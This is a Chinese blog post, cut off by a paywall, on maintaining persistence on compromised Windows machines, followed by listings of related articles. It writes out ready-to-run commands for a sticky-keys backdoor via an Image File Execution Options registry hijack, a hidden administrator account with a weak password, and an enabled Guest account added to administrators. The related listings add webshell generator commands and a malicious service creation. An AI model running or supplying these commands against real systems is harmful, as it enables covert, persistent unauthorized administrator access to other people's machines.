Windows权限维持

已于 2022-07-03 12:13:15 修改
阅读量397 收藏 1
点赞数
分类专栏: windows维权 文章标签: windows 服务器 运维
于 2022-07-03 12:05:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40012781/article/details/125582989
版权

远程登录类

映像劫持

“映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。

注册表位置:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

在此注册表位置添加项sethc.exe,添加debugger键的值为c:\windows\system32\cmd.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

此时点击五次shift键会打开cmd。(利用时,可以远程登录,然后多次点击触发后门上线)

影子账户

net user test$ 123456 /add&&net localgroup administrators test$ /add

激活Guest用户

net user guest /active:yes
net user guest 1234
net localgroup administrators guest /add

windows cmd命令行的切换用户设置

在打开的命令行中输入 runas /user:administra
最低0.47元/天 解锁文章
懒猫的sky
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows常见的几种权限维持
hackzkaq的博客
05-24 1663
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
内网渗透之windows权限维持
07-18
【标题】"内网渗透之windows权限维持"揭示了网络安全领域的一个重要话题——在Windows操作系统环境中如何保持已获得的权限,以便进行深度的系统分析或恶意活动。这通常涉及到对系统内部工作原理的理解,以及利用特定...
1、权限维持&域控后门&SSP
m0_65842464的博客
02-25 698
很多时候拿下了一台服务器权限后,可能过几天就会无法控制,因为企业都会有专业人士定期查杀后门、杀毒检测、漏洞修复等,所以可能很快就会失去控制权限,而权限维持的目的是保证自己的权限不会掉,一直能够控制目标服务器。两种方法都是盗取身份认证文件,便于长久访问的权限维持,第一种方法重启后失效,第二种方法重启后才生效,各有各的好处,所以可以配合使用。
.NET 分享一款多种方式维持权限的工具
最新发布
ahhacker86的专栏
05-27 1288
Sharp4Stay是一款功能强大的工具,专门设计用于在 Windows 环境中维持内网权限。它内置了 10 种不同的方法来确保攻击者可以持久地控制目标系统。以下将详细介绍其中的几种方法,因为图片过长,不便于文章展示,因此通过隐藏部分用法达到缩短图片长度,不便之处请读者朋友们谅解。03工具用法。
windows系统维权
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-05 122
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限。C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限。sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe" #创建服务。重启win10机器,靶机上线。
windows权限维持之注册表自启动
weixin_51692662的博客
05-05 263
windows权限维持之注册表自启动
【神兵利器】后渗透-权限维持工具之HackerPermKeeper
youmaob的博客
04-03 686
通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用。|| 越少,越难发现,但是部署起来,需要的依赖很多。ssh软链接&crontab。crontab后计划任务。发现程度:||||||发现程度:||||||发现程度:||||||发现程度:||||||
webshell管理工具(权限维持)笔记
边城浪子的博客
11-15 495
1.chopper 2.Cknife 3.WeBaCoo 命令:webacoo -g -o hack.php 连接命令:webacoo -t -u http://192.168.152.130/pentest/test/11/upload/hack.php 成功连接 4.Weevely 命令:weevely generate 123456 hack.php 命令:weevely http://1...
Telemetry:WINDOWS TELEMETRY权限维持
03-18
本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS ...
权限维持_Windows内核_驱动断链隐藏技术1
08-03
1. 恶意驱动件查找 2. 驱动断链隐藏结构 3. 代码分析实现
046-红队之浅谈基于Windows telemetry的权限维持.pdf
09-20
"红队浅谈基于Windows telemetry的权限维持" Windows Telemetry是一种强大的监控工具,红队可以使用它来维持权限,以下是相关知识点: 一、 Windows Telemetry 简介 Windows Telemetry是Windows操作系统中的一个...
Silentsoul04#vulnerability-paper-1#权限维持Windows 内核~ 驱动断链隐藏技术1
07-25
前言在做权限维持的时候,往往采用三环的技术显得可能微不足道了。本节用内核层的技术实现驱动信息隐藏。恶意驱动文件查找在普遍的红蓝对抗中,蓝队针对于底层的知识了解的
windows环境变量滥用维权/提权
qq_50854662的博客
09-14 334
windows环境变量滥用维权/提权
010109权限维持
TangTang_AM的博客
04-03 362
9-1权限维持 1. 权限维持的原因 前提:某目标服务器初始化现阶段存在安全漏洞,可以被利用拿到服务器权限。 一段时间后,系统管理员对系统进行升级,打补丁(patch),系统不存在安全漏洞,导致无法利用漏洞获得服务器权限。 2. 权限维持的使用 技术本身不具备好与坏,只是因为使用者的目的不同,导致结果的好与坏。 恶意人员利用权限维持技术,一直获得服务器权限。 合法且被授权的渗透测试人员,利用权限维持为了证明服务器存在对应的安全漏洞。 3. 权限维持案例环境介绍 目标机器:win7 没有m
十三、权限维持
谢小二的博客
06-12 1303
权限维持
各种Window权限维持姿势合集
11-19 486
Pentestlab博客自10月1号开始,按照ATT&CK技术框架的持久性技术点,更新了一系列关于Window权限维持的文章,现在还在不断更新中。我认为这是一个非...
Windows 权限维持手法
qq_53742230的博客
07-20 603
Windows 权限维持手法总结
Windows权限维持技术总结、复现
leah126的博客
03-13 875
的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。例如,要在 Windows 资源管理器用户界面启动之前运行某个程序,可以将该程序的名称替换为该条目的值中的 Userinit.exe,然后在该程序中包含启动 Userinit.exe 的指令。在 Windows 上有一个重要的机制,也就是服务。
Windows5次shift维权漏洞复现
热门推荐
wangyuxiang946的博客
07-26 1万+
Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限除此以外,还可以使用其他工具替换sethc.exe
“一千零一种”权限维持方法.pdf
02-05
"“一千零一种”权限维持方法.pdf - 关注Windows权限维持,包括理解、常用方法和安全相关的知识点" 本文档主要讲述了在网络安全领域如何维持对目标系统的长期控制,特别是针对Windows操作系统的权限维持技术。权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值